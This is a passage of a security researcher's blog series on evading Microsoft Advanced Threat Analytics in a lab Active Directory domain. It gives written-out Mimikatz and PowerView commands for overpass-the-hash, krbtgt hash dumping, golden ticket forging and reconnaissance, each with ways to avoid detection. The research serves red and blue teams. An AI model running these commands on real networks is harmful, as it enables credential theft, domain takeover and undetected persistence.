Once we have access to the NTLM hashes, we can use <a href="http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash">Overpass-the-hash</a> attack to create a Kerberos ticket and access resources and services as tempDA. From an administrative shell:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"sekurlsa::pth /user:tempda /domain:offensiveps.com /ntlm:a29f7623fd11550def0192de9246f46b /run:powershell.exe"'</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVl0_tazq9BBvW3BwjrAaBKOykMxHYjvuagUgcR0eqVUmRpFTS-Vf0bzapCb5Kgf__0pw-UXLP2VqWe0RlLbV2Uq-gLOq8VlrSy8sZdeJIYBGGi6z6bL26DLGSqsgwM83wzGoPm7aJAMU/s1600/OPTH-Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="671" data-original-width="1449" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVl0_tazq9BBvW3BwjrAaBKOykMxHYjvuagUgcR0eqVUmRpFTS-Vf0bzapCb5Kgf__0pw-UXLP2VqWe0RlLbV2Uq-gLOq8VlrSy8sZdeJIYBGGi6z6bL26DLGSqsgwM83wzGoPm7aJAMU/s400/OPTH-Detection.png" width="400" /></a></div>
We now have DA privileges! Nice, isn't it? Not really! ATA caught us:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPO9UVse7AK29zG0FAqG4Uuaby3Zm6uH8WN4k2By77syNpA6gvBiu59S9wE34ERbhIMJMNur_6SJi2VhW1h_J4XFNRIiz4ck9g76Yc2LVU0Jrv0sYJtdq-s6307ucdb5wxoB8QeX4t5XI/s1600/OPTH-Detection-ATA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="311" data-original-width="979" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPO9UVse7AK29zG0FAqG4Uuaby3Zm6uH8WN4k2By77syNpA6gvBiu59S9wE34ERbhIMJMNur_6SJi2VhW1h_J4XFNRIiz4ck9g76Yc2LVU0Jrv0sYJtdq-s6307ucdb5wxoB8QeX4t5XI/s400/OPTH-Detection-ATA.png" width="400" /></a></div>
What now? If we read the detection, it says "The encryption method of the Encrypted_Timestamp field of AS_REQ message from OPS-USER11 has been downgraded based on previously learned behavior." Ok. Let's investigate this!<br />
<br />
Let's see how the Encrypted_TimeStamp (in the PreAuthentication Data) field of AS-REQ message looks like when normal authentication (cleartext password) is used:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQFiKwBWMaP5b1SObwNvNJky9A-TdNv_7Hf5xNodkgSYxl08qPskmb5cbNxnXqm5CHaAJDgV7OcmXVuep01x838vNh15ed9YvGoBBzbL2EFk3se4SD2WFKc7NINCRC6E4Ahxw8ZPV8OYg/s1600/OPTH-Normal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="674" data-original-width="809" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQFiKwBWMaP5b1SObwNvNJky9A-TdNv_7Hf5xNodkgSYxl08qPskmb5cbNxnXqm5CHaAJDgV7OcmXVuep01x838vNh15ed9YvGoBBzbL2EFk3se4SD2WFKc7NINCRC6E4Ahxw8ZPV8OYg/s400/OPTH-Normal.png" width="400" /></a></div>
Now, below is how the same filed looks like when we use NTLM hash for Overpass-the-hash:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb5mk75hoTPt0zu1KWD3lEEq1AXc1NFwkYXeorD39YcwQoO_jU3gdC3BhDeTO4ADqAjaEz5gA9YCUUdlEp0R9ROXEDh6QX9wcqSx4EG1yE_4GBwZ34xK3B9xqBjYAlV-gkEp8Ou8s7v2w/s1600/OPTH-NTLM-Hash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="840" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb5mk75hoTPt0zu1KWD3lEEq1AXc1NFwkYXeorD39YcwQoO_jU3gdC3BhDeTO4ADqAjaEz5gA9YCUUdlEp0R9ROXEDh6QX9wcqSx4EG1yE_4GBwZ34xK3B9xqBjYAlV-gkEp8Ou8s7v2w/s400/OPTH-NTLM-Hash.png" width="400" /></a></div>
So, the encryption type downgrade is quite evident from the screenshots above. How to avoid this downgrade? By using AES keys! Use below command to extract AES keys from a remote computer:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"sekurlsa::ekeys"' -ComputerName ops-applocked</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMH337ZJqUgAK-ydb3XlnFpKVK_k8IkoYyodiXt4e9xqXwjux3ikKJfdl1AbfcXh_cjC9PaPw2Jue1QE6sxuqLGdm1XefWW99JIVsXz3xodZQqx51R9fe9O6TexyZ_TxcA1zEHPAXWG6o/s1600/DA-AES.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="305" data-original-width="1128" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMH337ZJqUgAK-ydb3XlnFpKVK_k8IkoYyodiXt4e9xqXwjux3ikKJfdl1AbfcXh_cjC9PaPw2Jue1QE6sxuqLGdm1XefWW99JIVsXz3xodZQqx51R9fe9O6TexyZ_TxcA1zEHPAXWG6o/s400/DA-AES.png" width="400" /></a></div>
And then use the below command to use it for Overpass-the-hash (note that we can use whatever AES128 keys if they are not available). It is always advisable to use all the hashes:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp06SgE3KAeNyCqoYSFIJWjabd_z4-lHqXQ9-ef8vo09IODMK15gWvNF5tFYAG8W6PQ8WYZOBR0cz5o2q6BaYXxGKmy7mstwKtlR7bAvFQTWEmv0tqffDqYxBx5QrqqwtoP8FE4aJvXic/s1600/OPTH-Bypass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="847" data-original-width="1532" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp06SgE3KAeNyCqoYSFIJWjabd_z4-lHqXQ9-ef8vo09IODMK15gWvNF5tFYAG8W6PQ8WYZOBR0cz5o2q6BaYXxGKmy7mstwKtlR7bAvFQTWEmv0tqffDqYxBx5QrqqwtoP8FE4aJvXic/s400/OPTH-Bypass.png" width="400" /></a></div>
<br />
Bingo! We have elevated our privileges to DA and this doesn't get detected by ATA!<br />
<br />
Please note the following <a href="http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash">from Benjamin's post</a>: "AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with KB2871997, in this case you can avoid NTLM hash."<br />
<br />
Another detection of Overpass-the-hash, as seen in the screenshot above, is "Unusual protocol implementation". I _believe_ that this detection is because of another field (supported encryption) in the AS-REQ packets. Can't confirm this and will welcome more research and comments on this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ5gWOFtBvh0DUnm3Y6_dOk98stuY9F61bv_0QKnIKHfaksVOaTW8G6TRW3DCh7J8L1Ka_nwiPKqAUtv-ngq-OrFqNuM8cJ7gVJPIjXdmrj-7mFuGJTz66yHb1PJPQaUwbe6ooDY6jWkM/s1600/Unusual+Protocol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="329" data-original-width="868" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ5gWOFtBvh0DUnm3Y6_dOk98stuY9F61bv_0QKnIKHfaksVOaTW8G6TRW3DCh7J8L1Ka_nwiPKqAUtv-ngq-OrFqNuM8cJ7gVJPIjXdmrj-7mFuGJTz66yHb1PJPQaUwbe6ooDY6jWkM/s400/Unusual+Protocol.png" width="400" /></a></div>
Another interesting thing to notice is, we can use Overpass-the-hash for generating false alerts on ATA! Failure events can be generated for any user, even a non-existing user, in the domain. Any made-up NTLM hash can be used for this.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoGVGLdbDDbHetaDfBgnczp-zoO96lZGAD6n9rAJfgbF_Vb_3Smec8rewGJFLtQR5pdUtSziOewo-BHV5deCHZROrUHuMOasAr_AUa2hTXlLs1MdUvhe2AIHStNWkUdX1vxGZuWrzlAuc/s1600/OPTH-fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="1101" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoGVGLdbDDbHetaDfBgnczp-zoO96lZGAD6n9rAJfgbF_Vb_3Smec8rewGJFLtQR5pdUtSziOewo-BHV5deCHZROrUHuMOasAr_AUa2hTXlLs1MdUvhe2AIHStNWkUdX1vxGZuWrzlAuc/s400/OPTH-fake.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<b>Golden Ticket</b><br />
Once, we have access to DA, let's establish persistence in the domain. We can create a Golden Ticket for that. Let's pull the RC4/NTLM hash of krbtgt account from the domain controller to create a golden ticket.<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"lsadump::lsa /name:krbtgt /patch"' -ComputerName ops-dc
</textarea></pre>
Let's create a golden ticket and inject it in memory. As soon as a resource in the domain is accessed, ATA will detect the golden ticket as:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggJAdIpxPlDyF8wnND-rNCpNcF26w9tFn7brwZk-FMrAypgM0xCRUms6oa2PqhS1kWAfUkyOprX6RyLXwmHi5p6-H0pmj-EC_S7Xup3KjnU_7dSsD0ZFm6YyUT_yFcL1OwNgrDyHoR2WY/s1600/GoldenTicket-Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="286" data-original-width="981" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggJAdIpxPlDyF8wnND-rNCpNcF26w9tFn7brwZk-FMrAypgM0xCRUms6oa2PqhS1kWAfUkyOprX6RyLXwmHi5p6-H0pmj-EC_S7Xup3KjnU_7dSsD0ZFm6YyUT_yFcL1OwNgrDyHoR2WY/s400/GoldenTicket-Detection.png" width="400" /></a></div>
Similar to Overpass-the-hash, ATA looks for encryption downgrade. Since golden ticket is a TGT, the focus is on TGS-REQ packet. Let's have a look at the encryption method of the TGT field of a TGS-REQ in case a user accesses a resource normally:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbkpmAJ64tjUQEZ7kPHssBRknut-RqpWKPc43PNA-DdVsyKp4OZVxO7emXXFTvmo11tJD2dBWqDqtvM9jD7AXKM-ltoWoDfh84N5xYUpuPlMsefzZ3f-_hxGUGMQJPdNTqXmg3poEjOK4/s1600/Golden-Ticket-Normal-TGS-REQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="835" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbkpmAJ64tjUQEZ7kPHssBRknut-RqpWKPc43PNA-DdVsyKp4OZVxO7emXXFTvmo11tJD2dBWqDqtvM9jD7AXKM-ltoWoDfh84N5xYUpuPlMsefzZ3f-_hxGUGMQJPdNTqXmg3poEjOK4/s400/Golden-Ticket-Normal-TGS-REQ.png" width="400" /></a></div>
And this is how a golden ticket generated using NTLM hash of krbtgt looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcDbmVmdm2FKVDqjcz5RRBkmXAa-dw2rF35SiMp24DSjEpk0yBEjq7RC-U7sg9LN6-qdcm0bDmfmYzLE3O8VdaB4BGmxfLuB0Pe4vMetifd6jL9r8bxuaJ3OfbypXz3SJmYKzfaX5SAac/s1600/Golden-Ticket-NTLM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="789" data-original-width="795" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcDbmVmdm2FKVDqjcz5RRBkmXAa-dw2rF35SiMp24DSjEpk0yBEjq7RC-U7sg9LN6-qdcm0bDmfmYzLE3O8VdaB4BGmxfLuB0Pe4vMetifd6jL9r8bxuaJ3OfbypXz3SJmYKzfaX5SAac/s400/Golden-Ticket-NTLM.png" width="400" /></a></div>
Clearly a downgrade. How to make a golden ticket appear normal? Right! AES keys once again!<br />
<br />
Let's use "/inject" option of the lsadump::lsa module in mimikatz:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"lsadump::lsa /name:krbtgt /inject"' -ComputerName ops-dc
</textarea></pre>
"/inject" provides additional credentials. How? Why? <a href="https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html">See this post.</a><br />
<br />
Once we have the AES keys, a golden ticket can be generated and used without detection:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:offensiveps.com /sid:S-1-5-21-2578538781-2508153159-3419410681 /aes256:75e6d456868270a705e16ffd7a660dc7afe37817564a6470d446ab31f3c1235g /id:500 /groups:513 /ptt"'
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN1dvL8jGCDTs6wOUt81lHUZ5kjvwIhNbxRgrKYcZuSulfbBtCE93qVlFsGmquitHxOubcu6GTKUanTwVBkEFXXdPFmrLumZr-Stcz0qmPQf7nApWw3hdd64SI83CM2eBtR6bTJb1Jync/s1600/Golden-Ticket-Bypass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="1436" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN1dvL8jGCDTs6wOUt81lHUZ5kjvwIhNbxRgrKYcZuSulfbBtCE93qVlFsGmquitHxOubcu6GTKUanTwVBkEFXXdPFmrLumZr-Stcz0qmPQf7nApWw3hdd64SI83CM2eBtR6bTJb1Jync/s400/Golden-Ticket-Bypass.png" width="400" /></a></div>
<br />
<b>Another Golden Ticket Bypass</b><br />
Previous one is not the only golden ticket bypass! When I found out the next one, I couldn't believe it!<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
I hope the Golden Ticket bypass for <a href="https://twitter.com/hashtag/ATA?src=hash">#ATA</a> I discovered today turns out to be false. Too easy to be true. Can't wait to share :) <a href="https://twitter.com/hashtag/BHUSA?src=hash">#BHUSA</a></div>
— Nikhil Mittal (@nikhil_mitt) <a href="https://twitter.com/nikhil_mitt/status/878252995527364608">June 23, 2017</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script><br />
We can actually avoid golden ticket detection while still using RC4/NTLM hash of the krbtgt account by using a non-existent username!<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::golden /User:nonexistent /domain:offensiveps.com /sid:S-1-5-21-2578538781-2508153159-3419410681 /rc4:c468ec50882a8b29a0c01d1ed1234567 /id:500 /groups:513 /ptt"'
</textarea></pre>
In ATA 1.8, ticket lifetime based detection was introduced. "If a Kerberos ticket is used for more than the allowed lifetime, ATA will detect it as a suspicious activity" - <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/whats-new-version-1.8">What's new in ATA version 1.8</a><br />
<br />
Now, let's hold our horses and think. Why should we save a golden ticket to disk at all? It is the no-change of krbtgt hash which provides the persistence and NOT the golden ticket. We can always create a golden ticker whenever there is a need to access a resource, just keep the krbtgt hash handy!<br />
<br />
Also, we can set lifetime of the ticket while creating a golden ticket. Enumerate the Kerberos policy using (Get-DomainPolicy)."Kerberos Policy" from PowerView. The default ticket lifetime is 10 hours. In the lab, it is setup as 1 hour. To avoid using a ticket beyond lifetime we can use the following options. The golden ticket create in the below command is valid for one hour after two hours from the time of creation and can be renewed during 7 days (10080 minutes):<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:offensiveps.com /sid:S-1-5-21-3270384115-3177237293-604223748 /aes256: /id:500 /groups:513 /startoffset:120 /endin:60 /renewmax:100800 /ticket:golden.kirbi"‘
</textarea></pre>
Make sure that you purge the golden ticket from the target box otherwise ATA will detect it.<br />
<br />
That is all for Day 2. Hope you liked it! :)<br />
<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com2tag:blogger.com,1999:blog-8135211063584500909.post-16650111398093508152017-08-07T21:01:00.002+05:302018-05-03T22:15:43.893+05:30Week of Evading Microsoft ATA - Announcement and Day 1<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I have been playing with <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata">Microsoft Advanced Threat Analytics (ATA)</a> for past few months. I found it useful for Blue Teams and scary as a Red Teamer as it detects many Active Directory (AD) tools and techniques. Naturally, I needed ways to bypass it and that is something which motivated me to spend weekends and nights looking for ways out. I found some methods to bypass ATA, some to avoid it and some to attack the ATA installation. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I gave a talk about Evading Microsoft ATA for Active Directory Dominance at Black Hat USA last week (slides at the end of the post) and would speak at 44CON and BruCON on some of the additional research I am doing. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
What I found mostly during my research was it is not really difficult to evade detection by ATA as long as we are not running tools blindly without understanding what they do. So, to generate interest on using offensive tools more wisely and modifying techniques based on the detection mechanisms, in addition to my talks at multiple conferences, I announce a <b>Week of Evading Microsoft ATA </b>beginning from 7th of August 2017.</div>
<div style="text-align: justify;">
<b><br />
</b></div>
<div style="text-align: justify;">
We will see interesting stuff the whole week which includes whatever discussed in my talk and more:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</b><br />
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html">Day 2 - Detection and bypass of overpass-the-hash and golden ticket</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day3.html">Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day4.html">Day 4 - Bypasses/avoidance by reducing conversation with the DC</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day5.html">Day 5 - Attacking ATA deployment, limitations of research and mitigation</a></b></div>
<br />
<div style="text-align: justify;">
Let's get started with Day 1:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>What is ATA?</b></div>
<div style="text-align: justify;">
ATA is a platform which listens to <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-prerequisites">certain protocols</a> going to the Domain Controllers (DC) of a domain. It can integrate with syslog, SIEM etc. It can detect attacks based on anomaly and user behaviour. AFAIK, for anomaly detection there is no learning period for some attacks (one week for certain attacks) and for behavioural detection there is a learning period of 21 days. We are going to focus only on the anomaly based attacks.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>ATA Architecture</b></div>
<div style="text-align: justify;">
ATA needs to see the traffic being sent to the DC. Here is how it looks like:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGHVouRZFFviXFculrhZhGXVGDuYkTRd_m0iLWNW9_PWUXFMRuhE4SeiYKGYMdegcmh-syR60p7koCysXqleNmKydRdREr5HXAW6AdWXZF2WFy_SLP6KCRMyKFKGNzfDWNWbiWGtpuEJ8/s1600/ATA-Architecture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="771" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGHVouRZFFviXFculrhZhGXVGDuYkTRd_m0iLWNW9_PWUXFMRuhE4SeiYKGYMdegcmh-syR60p7koCysXqleNmKydRdREr5HXAW6AdWXZF2WFy_SLP6KCRMyKFKGNzfDWNWbiWGtpuEJ8/s400/ATA-Architecture.png" width="400" /></a></div>
<div style="text-align: justify;">
ATA Gateway is that part which reads the traffic and parses it. ATA Center is that part which stores the parsed traffic, do analysis, stores everything in a mongodb and hosts ATA console where we can see alerts. The Gateway can either be a separate box or a lightweight one which can be installed on to a DC. More on architecture <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-architecture">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Lab Setup</b></div>
<div style="text-align: justify;">
The lab setup uses a Lightweight ATA Gateway with ATA 1.8 (started with 1.7) which is the latest at the time of writing - 30th July 2017. I use this installation in my PowerShell and Active Directory training and therefore, the installation has been tested by more than 400 hackers and infosec professionals in last 7 months. </div>
<br />
<div style="text-align: justify;">
<b>What attacks can ATA detect?</b></div>
<div style="text-align: justify;">
Many! Have a look at this link: <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-threats">What threats does ATA look for?</a></div>
<div style="text-align: justify;">
The attacks which we are interested in:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Recon</div>
<div style="text-align: justify;">
- Account enumeration</div>
<div style="text-align: justify;">
- NetSession enumeration</div>
<div style="text-align: justify;">
- Directory services enumeration. </div>
<div style="text-align: justify;">
Above attacks result in enumeration of users, computers, group membership, sessions etc. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Compromise Credentials</div>
<div style="text-align: justify;">
- Brute-force</div>
<div style="text-align: justify;">
- Unusual protocol implementation</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Lateral Movement</div>
<div style="text-align: justify;">
- Pass the ticket</div>
<div style="text-align: justify;">
- Pass the hash</div>
<div style="text-align: justify;">
- Overpass-the-hash</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Domain Dominance</div>
<div style="text-align: justify;">
- Golden Ticket</div>
<div style="text-align: justify;">
- Malicious replication requests</div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
Once we understand the architecture, let's jump in and have a look at various attacks. We will follow a simple "attack chain" where we begin with a normal domain user privileges and then work our way up to domain dominance. We will see ATA detects us and how it can be bypassed at each step.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<b>Recon</b></div>
</div>
<div>
<div style="text-align: justify;">
<b><br />
</b></div>
</div>
<div style="text-align: justify;">
We assume that we have a normal domain user privileges. We start with the domain enumeration and try to list computers, group membership of domain admins etc. This enumeration is fine with ATA most of the times. But for some enumeration there are alerts. For example, if you enumerate all users and groups in a domain using PowerView, there are no alerts but if the native net.exe is used that may be detected as "Reconnaissance using directory services enumeration":</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwYnwWLs6EENP3uMzXSDlwBBj9-pdLx1ExN5FB3RBALxjxJOBH0yy3o1NKckToxX6AlpXgT2Wiir_hpWE8QJKizewx7GqsKZqaw9kAqVreLEaABOGpmW9m9MjumZ4i_8hvderwh3fOn1Y/s1600/Enumeration-SAMR-Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="1232" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwYnwWLs6EENP3uMzXSDlwBBj9-pdLx1ExN5FB3RBALxjxJOBH0yy3o1NKckToxX6AlpXgT2Wiir_hpWE8QJKizewx7GqsKZqaw9kAqVreLEaABOGpmW9m9MjumZ4i_8hvderwh3fOn1Y/s400/Enumeration-SAMR-Detection.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
Why so? Because ATA currently detects such enumeration done using SAMR protocol which is used by net.exe. PowerView uses LDAP queries which ATA does not care about currently for enumeration. In fact, ATA is mostly interested in the authentication related data when it comes to LDAP.<br />
<br />
To avoid detection WMI queries can also be used. This was covered by Chris Thompson (@retBandit) in <a href="https://www.slideshare.net/ChrisThompson73/ms-just-gave-the-blue-team-tactical-nukes-and-how-red-teams-need-to-adapt-defcon-25">his DEF CON talk</a>:<br />
<br />
Get all users in the domain "opsdc"<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-WmiObject -Class Win32_UserAccount -Filter "Domain='opsdc' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID</textarea></pre>
Get all domain groups:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-WmiObject -Class win32_group -Filter "Domain='opsdc'"</textarea></pre>
Get membership of the Domain Admins group:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> GGet-WmiObject -Class win32_groupUser | Where-Object {($_.GroupComponent -match "Domain Admins") -and ($_.GroupComponent -match "opsdc")} | %{[wmi]$_.PartComponent}</textarea></pre>
Because we have enough information now, let's move ahead with some more enumeration. Let's start hunting for local admin privileges on other boxes.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Find-LocalAdminAccess -Verbose
</textarea></pre>
<span style="text-align: justify;">Let's hunt for a machine where a DA token is available and we have local admin privileges:</span><br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-UserHunter -Verbose
</textarea></pre>
<span style="text-align: justify;">Both the above activities are detected by ATA as Reconnaissance using SMB session enumeration:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP3KkGDf3ew1w81sUlgueZ0i9fu2T_uBgKsVFtLWx7T2EWqu7Z_yIcUd1NH0gQh41KxhfrHZ1-zS_03LDlRghPZBR6PwL5vTfoCvU-pECOyryIP3Rj1xJ4_Pazbsj7t6NtNM9icpqjJlo/s1600/Enumeration+-+SMB+-+Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="1236" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP3KkGDf3ew1w81sUlgueZ0i9fu2T_uBgKsVFtLWx7T2EWqu7Z_yIcUd1NH0gQh41KxhfrHZ1-zS_03LDlRghPZBR6PwL5vTfoCvU-pECOyryIP3Rj1xJ4_Pazbsj7t6NtNM9icpqjJlo/s400/Enumeration+-+SMB+-+Detection.png" width="400" /></a></div>
<div style="text-align: justify;">
Now, if we look at the alert closely. ATA complains about Recon against only the DC. What does that mean? That means, if we gather the information from the DC but do not run user hunting against the DC it would be possible to bypass this detection. To avoid running user hunting against the DC, we need to use the -ComputerFile parameter of Invoke-UserHunter or Find-LocalAdminAccess and provide a list of computers which does not contain the name or IP of the DC.</div>
<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-UserHunter -ComputerFile .\computers.txt -Verbose</textarea></pre>
<br />
This is how it looks like in the lab:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
